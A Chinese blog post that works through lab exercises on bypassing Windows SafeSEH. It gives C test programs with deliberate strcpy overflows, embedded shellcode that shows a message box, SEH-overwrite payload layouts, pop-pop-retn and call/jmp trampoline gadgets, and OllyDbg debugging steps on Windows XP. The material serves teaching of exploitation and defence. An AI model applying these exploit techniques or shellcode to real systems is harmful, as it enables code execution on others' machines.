<!DOCTYPE html>




<html class="theme-next mist" lang="zh-Hans">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="googleaf0347feb5ea0936.html" />














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="windows,SEH," />





  <link rel="alternate" href="/atom.xml" title="Introspelliam" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="1. 攻击返回地址绕过SafeSEH在《栈溢出原理与实践》中有介绍 2. 利用虚函数绕过SafeSEH在《绕过GS安全编译的方法》中有范例 3. 从堆中绕过SafeSEH3.1 实验代码 #include &quot;stdafx.h&quot; #include &quot;stdlib.h&quot; #include &quot;string.h&quot;  char shellcode[] =     &quot;\xFC\x68\x6A\x0A\x38\">
<meta name="keywords" content="windows,SEH">
<meta property="og:type" content="article">
<meta property="og:title" content="绕过SafeSEH的方法">
<meta property="og:url" content="http://yoursite.com/2017/07/08/0day/绕过SafeSEH的方法/index.html">
<meta property="og:site_name" content="Introspelliam">
<meta property="og:description" content="1. 攻击返回地址绕过SafeSEH在《栈溢出原理与实践》中有介绍 2. 利用虚函数绕过SafeSEH在《绕过GS安全编译的方法》中有范例 3. 从堆中绕过SafeSEH3.1 实验代码 #include &quot;stdafx.h&quot; #include &quot;stdlib.h&quot; #include &quot;string.h&quot;  char shellcode[] =     &quot;\xFC\x68\x6A\x0A\x38\">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/dll_setting.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/ollysseh.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/seh1.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/seh2.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/seh3.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/map_call.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/activex.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/breakpoint_printf_aaaa.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/safeseh.jpg">
<meta property="og:image" content="http://yoursite.com/images/2017-07-08/call_jmp.jpg">
<meta property="og:updated_time" content="2018-07-09T11:41:14.976Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="绕过SafeSEH的方法">
<meta name="twitter:description" content="1. 攻击返回地址绕过SafeSEH在《栈溢出原理与实践》中有介绍 2. 利用虚函数绕过SafeSEH在《绕过GS安全编译的方法》中有范例 3. 从堆中绕过SafeSEH3.1 实验代码 #include &quot;stdafx.h&quot; #include &quot;stdlib.h&quot; #include &quot;string.h&quot;  char shellcode[] =     &quot;\xFC\x68\x6A\x0A\x38\">
<meta name="twitter:image" content="http://yoursite.com/images/2017-07-08/dll_setting.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.2',
    sidebar: {"position":"right","display":"always","offset":0,"offset_float":0,"b2t":true,"scrollpercent":true,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: false,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/07/08/0day/绕过SafeSEH的方法/"/>





  <title>绕过SafeSEH的方法 | Introspelliam</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?663212c5ef558c27e77385b620f14823";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script><!-- hexo-inject:begin --><!-- hexo-inject:end -->




</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Introspelliam</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">Just do what works for you, because there will always be someone who thinks differently.</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br />
            
            站点地图
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/07/08/0day/绕过SafeSEH的方法/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Introspelliam">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/me.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Introspelliam">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">绕过SafeSEH的方法</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-07-08T10:01:51+08:00">
                2017-07-08
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/安全技术/" itemprop="url" rel="index">
                    <span itemprop="name">安全技术</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="1-攻击返回地址绕过SafeSEH"><a href="#1-攻击返回地址绕过SafeSEH" class="headerlink" title="1. 攻击返回地址绕过SafeSEH"></a>1. 攻击返回地址绕过SafeSEH</h3><p>在<a href="/2017/06/22/栈溢出原理与实践/">《栈溢出原理与实践》</a>中有介绍</p>
<h3 id="2-利用虚函数绕过SafeSEH"><a href="#2-利用虚函数绕过SafeSEH" class="headerlink" title="2. 利用虚函数绕过SafeSEH"></a>2. 利用虚函数绕过SafeSEH</h3><p>在<a href="/2017/07/04/绕过GS安全编译的方法/">《绕过GS安全编译的方法》</a>中有范例</p>
<h3 id="3-从堆中绕过SafeSEH"><a href="#3-从堆中绕过SafeSEH" class="headerlink" title="3. 从堆中绕过SafeSEH"></a>3. 从堆中绕过SafeSEH</h3><h4 id="3-1-实验代码"><a href="#3-1-实验代码" class="headerlink" title="3.1 实验代码"></a>3.1 实验代码</h4><pre><code>
#include "stdafx.h"
#include "stdlib.h"
#include "string.h"

char shellcode[] =
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
    "\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xB8\x28\x39\x00";

void test(char *input)
{
    char str[200];
    strcpy(str, input);
    int zero = 0;
    zero = 1/zero;
}

void main()
{
    char * buf = (char *)malloc(500);
    //__asm int 3
    strcpy(buf, shellcode);
    test(shellcode);
}
</code></pre>

<h4 id="3-2-实验内容"><a href="#3-2-实验内容" class="headerlink" title="3.2 实验内容"></a>3.2 实验内容</h4><p><b>实验思路：</b></p>
<ol>
<li>首先从堆中申请500字节的空间，用来存放shellcode</li>
<li>函数test存在典型的溢出，通过向str复制超长字符串造成str溢出，进而覆盖程序的SEH信息</li>
<li>用shellcode在堆中的起始位置覆盖异常处理函数地址，然后通过制造除0异常，将程序转入异常处理，进而跳转到堆中的shellcode执行</li>
</ol>
<p><b>实验环境：</b></p>
<table>
<thead>
<tr>
<th></th>
<th>推荐使用环境</th>
<th>备注</th>
</tr>
</thead>
<tbody>
<tr>
<td>操作系统</td>
<td>Windows XP SP3</td>
<td>DEP关闭</td>
</tr>
<tr>
<td>编译器</td>
<td>Visual Studio 2008</td>
<td></td>
</tr>
<tr>
<td>编译选项</td>
<td><font color="#f00">禁用优化选项</font></td>
<td></td>
</tr>
<tr>
<td>build版本</td>
<td>release版本</td>
</tr>
</tbody>
</table>
<p><b>得到的数据</b><br>申请的堆空间起始地址:0x003928B8<br>复制给str后的栈起始地址：0x0012FE9C<br>离栈顶最近的SEH处理函数句柄：0x0012FFB0+4</p>
<p><b>于是得到shellcode：</b></p>
<ol>
<li>168字节的谈对对话框机器码</li>
<li>112 * &quot;\x90&quot;</li>
<li>堆起始地址: 0x003928B8</li>
</ol>
<h3 id="4-利用未启用SafeSEH模块绕过SafeSEH"><a href="#4-利用未启用SafeSEH模块绕过SafeSEH" class="headerlink" title="4. 利用未启用SafeSEH模块绕过SafeSEH"></a>4. 利用未启用SafeSEH模块绕过SafeSEH</h3><font color="#f00">如果模块未启用SafeSEH，并且模块不是仅包含中间语言IL，这个异常处理就可以被执行。所以若能找到一个不启用SafeSEH的dll，然后加载之后通过它里面的指令作为跳板实现SafeSEH的绕过。</font>

<h4 id="4-1-实验代码"><a href="#4-1-实验代码" class="headerlink" title="4.1 实验代码"></a>4.1 实验代码</h4><pre><code>
#include "stdafx.h"
#include "string.h"
#include "windows.h"

char shellcode[] = 
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x68"
    "\xf1\x21\x12\x11"
    "\x90\x90\x90\x68\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
    "\x53\xFF\x57\xFC\x53\xFF\x57\xF8";

DWORD MyException(void)
{
    printf("There is an exception");
    getchar();
    return 1;
}

void test(char *input)
{
    char str[200];
    strcpy(str, input);
    int zero = 0;
    __try{
        zero = 1/zero;
    }
    __except(MyException()){}
}

int _tmain(int argc, _TCHAR *argv[])
{
    // Load NO_SafeSEH Module
    HINSTANCE hInst = LoadLibrary(_T("SEH_NOSafeSEH_JUMP.dll"));
    char str[200];
    //__asm int 3
    test(shellcode);
    return 0;
}
</code></pre>

<h4 id="4-2-实验内容"><a href="#4-2-实验内容" class="headerlink" title="4.2 实验内容"></a>4.2 实验内容</h4><p><b>实验思路：</b></p>
<ol>
<li>用VC++ 6.0编译一个不是用SafeSEH的动态链接库SEH_NOSafeSEH_JUMP.DLL，然后由启用SafeSEH的应用程序SEH_NOSafeSEH.EXE去加载</li>
<li>SEH_NOSafeSEH中的test函数存在典型的溢出，通过向str复制超长字符串造成str溢出，进而覆盖程序的SEH信息</li>
<li>使用SEH_NOSafeSEH_JUMP.DLL中的&quot;pop pop retn&quot;指令地址覆盖异常处理函数地址，然后通过制造除0异常，将程序转入异常处理。通过劫持异常处理流程，程序转入SEH_NOSafeSEH_JUMP.DLL中执行&quot;pop pop retn&quot;指令，在执行retn后程序转入shellcode执行。</li>
</ol>
<p><b>实验环境：</b></p>
<table>
<thead>
<tr>
<th></th>
<th>推荐使用环境</th>
<th>备注</th>
</tr>
</thead>
<tbody>
<tr>
<td>操作系统</td>
<td>Windows XP SP3</td>
<td>DEP关闭</td>
</tr>
<tr>
<td>EXE编译器</td>
<td>Visual Studio 2008</td>
<td></td>
</tr>
<tr>
<td>DLL编译器</td>
<td>VC++ 6.0</td>
<td>将dll基址设为0x11120000</td>
</tr>
<tr>
<td>编译选项</td>
<td><font color="#f00">禁用优化选项</font></td>
<td></td>
</tr>
<tr>
<td>build版本</td>
<td>release版本</td>
</tr>
</tbody>
</table>
<p><b>编译DLL</b></p>
<ol>
<li>在VC++ 6.0新建“Win32 Dynamic-Link Library”工程，创建一个<font color="#f00">简单的DLL工程</font></li>
<li>按照实验代码编写对应的cpp文件</li>
<li>由于VC++ 6.0默认编译的DLL文件加载地址为0x10000000，如果其作为DLL加载地址可能会包含0x00，这会导致strcpy字符串截断，所以为方便测试，需要重新设置基址。&quot;工程-&gt;设置-&gt;连接选显卡&quot;，在&quot;工程选项&quot;输入框中添加&quot;/base:&quot;0x11120000&quot;&quot;<br><img src="/images/2017-07-08/dll_setting.jpg" alt="编译DLL的图"></li>
</ol>
<p><b>OllySSEH插件说明</b><br>对于SafeSEH描述分为以下四种，如图所示</p>
<ol>
<li>/SafeSEH OFF: 未启用SafeSEH，这种模式可作为跳板</li>
<li>/SafeSEH ON：启用SafeSEH，可以使用右键点击查看SEH注册情况</li>
<li>NO SEH：不支持SafeSEH，即IMAGE_DLLCHARACTERISTICS_NO_SEH标志位被设置，模块内的异常会被忽略，所以不能作为跳板</li>
<li>Erro：读取错误</li>
</ol>
<p><img src="/images/2017-07-08/ollysseh.jpg" alt="ollysseh描述图"></p>
<p><b>后续操作</b></p>
<ol>
<li>在SEH_NOSafeSEH_JUMP.DLL中找到&quot;pop pop retn&quot;序列。非常蛋疼的是明明在dll文件中写入一个函数&quot;pop eax, pop eax, retn&quot;，但是在编译的时候就找不到了。不过dll文件中存在&quot;pop ecx, pop ecx, retn&quot;这样原始序列，我们也可以拿来使用，位置为0x111221F1</li>
<li>溢出字符串起始位置0x0012FDB8<br>最近的异常处理函数句柄0x0012FE90+4</li>
<li>VS 2008编译的程序，在进入含有\_\<em>try{}的函数时会在Security Cookie+4的位置压入-2（VC++ 6.0下为-1），在程序进入\</em>\<em>try{}区域时程序会根据该\</em>\<em>try{}块在函数中的位置而修改成不同的值（第一层try会将这个值修改为0， 第二层会将这个值修改1）。如果\</em>\<em>try{}块中出现异常，程序会根据这个值调用相应的\</em>\<em>except()处理，处理结束后这个位置的值会重新修改为-2；如果每发生异常，程序会在离开\</em>\_try{}块时这个值也会被修改回-2。</li>
<li>由于上面的操作，如果将shellcode放在前面的话可能会对弹出对话框的造成破坏，所以将弹出对话框的机器码放在了最后</li>
</ol>
<p><br><br><b>shellcode组成</b></p>
<ol>
<li>220 * &quot;\x90&quot;</li>
<li>&quot;pop pop retn&quot;地址0x111221F1</li>
<li>16 * &quot;\x90&quot;</li>
<li>168字节的弹出对话框机器码<br><br></li>
</ol>
<h4 id="4-3-验证及其思考"><a href="#4-3-验证及其思考" class="headerlink" title="4.3 验证及其思考"></a>4.3 验证及其思考</h4><p><br><br>由于用上面的shellcode无法正常出现弹框，所以我花了半天时间来解决这中间的问题！</p>
<p><b><font color="#f00">Ollydbg如何调试SEH？</font></b><font color="#0f0"></font></p>
<ol>
<li>首先程序运行到出错的汇编代码处，然后两次&quot;Shift+F7&quot;进入错误判断程序</li>
<li>然后通过SEH Chain窗口，获取离栈顶最近的SEH，双击跳转至该地址，&quot;F2&quot;设置断点</li>
<li>最后直接&quot;F9&quot;跳转至该位置<br></li>
</ol>
<p><img src="/images/2017-07-08/seh1.jpg" alt="第一次SEH处理句柄"></p>
<p><b><font color="#f00">&quot;pop pop retn&quot;作为异常处理函数所做的工作</font></b><font color="#0f0"></font></p>
<ol>
<li>首先，弹出异常判断回去的指针</li>
<li>然后弹出原始栈顶中的一位参数</li>
<li>最后返回离栈顶最近的SEH的链表指针所在地址(而不是函数处理句柄)【有时候由于没有中间的参数，而导致返回的是函数处理句柄】<br></li>
</ol>
<p><img src="/images/2017-07-08/seh2.jpg" alt="进入shellcode"></p>
<p>从上面的图片可以看出，2112被解析成&quot;AND DWORD PTR DS:[EDX],EDX&quot;，而EDX是不能被修改的，所以出错，后面的指令也陆续发生错误！</p>
<p><font color="#f00">解决办法：修改SEH链表指针&quot;\x90\x90\x90\x90&quot;。</font></p>
<p><font color="#f00">本人尝试了很多办法，最后使用的将0x111221F1作为push的参数压入栈中</font><br><img src="/images/2017-07-08/seh3.jpg" alt="修改后的结果"></p>
<p>紧接着的数据本来是&quot;\x90\x90\x90\x90&quot;，但是可能中间的某些操作导致该数据被修改为0000，可以使用同样的办法，将其压入栈中</p>
<p><b>最终的shellcode组成</b></p>
<ol>
<li>219 * &quot;\x90&quot; + &quot;\x68&quot;</li>
<li>&quot;pop pop retn&quot;地址0x111221F1</li>
<li>3 * &quot;\x90&quot; + &quot;\x68&quot; + 12 * &quot;\x90&quot;</li>
<li>168字节的弹出对话框机器码</li>
</ol>
<p><br></p>
<h3 id="5-利用加载模块之外的地址绕过SafeSEH"><a href="#5-利用加载模块之外的地址绕过SafeSEH" class="headerlink" title="5. 利用加载模块之外的地址绕过SafeSEH"></a>5. 利用加载模块之外的地址绕过SafeSEH</h3><p><br><br>OllyDbg调试时，用&quot;view-&gt;memory&quot;可以查看程序的映射状态。类型为&quot;Map&quot;的映射文件，SafeSEH是无视的。当异常处理函数指针指向这些地址范围内时，是不对其进行有效性验证的。如果可以在这些文件中找到跳板指令，就可以绕过SafeSEH。</p>
<pre><code>
其实除了"pop pop retn"指令序列外，一下指令也可以使用：
call/jmp dword ptr [esp+0x8]
call/jmp dword ptr [esp+0x14]
call/jmp dword ptr [esp+0x1c]
call/jmp dword ptr [esp+0x2c]
call/jmp dword ptr [esp+0x44]
call/jmp dword ptr [esp+0x50]
call/jmp dword ptr [ebp+0xc]
call/jmp dword ptr [ebp+0x24]
call/jmp dword ptr [ebp+0x30]
call/jmp dword ptr [ebp-0x4]
call/jmp dword ptr [ebp-0xc]
call/jmp dword ptr [ebp-0x18]

</code></pre>

<h4 id="5-1-实验代码"><a href="#5-1-实验代码" class="headerlink" title="5.1 实验代码"></a>5.1 实验代码</h4><pre><code>
#include "stdafx.h"
#include "string.h"
#include "windows.h"

char shellcode[] = 
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
    "\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xE9\x2B\xFF\xFF\xFF\x90\x90\x90"
    "\xEB\xF6\x90\x90"
    "\x0B\x0B\x28\x00";

DWORD MyException(void)
{
    printf("There is an exception");
    getchar();
    return 1;
}

void test(char * input)
{
    char str[200];
    strcpy(str, input);
    int zero=0;
    __try
    {
        zero = 1/zero;
    }
    __except(MyException()){}
}

int _tmain(int argc, _TCHAR* argv[])
{
    //__asm int 3
    test(shellcode);
    return 0;
}

</code></pre>

<h4 id="5-2-实验内容"><a href="#5-2-实验内容" class="headerlink" title="5.2 实验内容"></a>5.2 实验内容</h4><p><b>实验思路：</b></p>
<ol>
<li>Test函数存在典型的溢出，通过向str复制超长字符串造成str溢出，进而覆盖程序的SEH</li>
<li>该程序中所有加载模块都启用了SafeSEH机制，故不能通过未启用SafeSEH的模块来绕过SafeSEH</li>
<li>将异常处理函数指针覆盖为加载模块外的地址来实现对SafeSEH的绕过，然后通过除0触发异常程序转入异常处理，进而劫持程序流程。</li>
</ol>
<p><b>实验环境：</b></p>
<table>
<thead>
<tr>
<th></th>
<th>推荐使用环境</th>
<th>备注</th>
</tr>
</thead>
<tbody>
<tr>
<td>操作系统</td>
<td>Windows XP SP3</td>
<td>DEP关闭</td>
</tr>
<tr>
<td>编译器</td>
<td>Visual Studio 2008</td>
<td></td>
</tr>
<tr>
<td>编译选项</td>
<td><font color="#f00">禁用优化选项</font></td>
<td></td>
</tr>
<tr>
<td>build版本</td>
<td>release版本</td>
</tr>
</tbody>
</table>
<p><b>实验内容：</b></p>
<ol>
<li>获取数据：(溢出字符串起始位置0x0012FE88)<br>(距离栈顶最近的异常处理函数句柄0x0012FF60+4)</li>
<li>使用OllyDbg插件OllyFindAddr，可以在整个程序的内存空间搜索。本实验使用call/jmp dword ptr[ebp+n]指令作为跳板。&quot;Plugins-&gt;OllyFindAddr-&gt;Overflow return address-&gt;Find CALL/JMP [EBP+N]&quot;来进行指令的搜索。</li>
<li>在0x00280B0B中找到了call [ebp+x030]的指令(但是0x00会被截断，如果是Unicode漏洞就不用考虑这个问题，因为Unicode的结束符号为0x0000)</li>
<li>使用两段跳的方式跳至shellcode起始处执行<ul>
<li>通过一个2字节的短跳指令0xEBF6向回跳8个字节</li>
<li>在这8个字节中布置一条5字节的长跳转指令完成最终的回跳<br><img src="/images/2017-07-08/map_call.jpg" alt="搜索跳板的结果"></li>
</ul>
</li>
</ol>
<p><b>shellcode组成：</b></p>
<ol>
<li>168字节的弹出对话框机器码</li>
<li>40 * &quot;\x90&quot;</li>
<li>长跳指令和0x90填充 &quot;\xE9\x2B\xFF\xFF\xFF\x90\x90\x90&quot;</li>
<li>短跳转指令和0x90填充 &quot;\xEB\xF6\x90\x90&quot;</li>
<li>跳板指令&quot;\x0B\x0B\x28\x00&quot;</li>
</ol>
<p><br></p>
<h4 id="5-3-验证及其思考"><a href="#5-3-验证及其思考" class="headerlink" title="5.3 验证及其思考"></a>5.3 验证及其思考</h4><p><br><br>由于一开始无法在0x00280B0B处设置断点，所以无法进入去查看,后来使用Animate into之后，能够在0x00280B0B处停止，方便我们调试。进入之后发现跳转指令直接跳转至SEH的链表指针所在地址，这就有我们 前面讲的shellcode来源。</p>
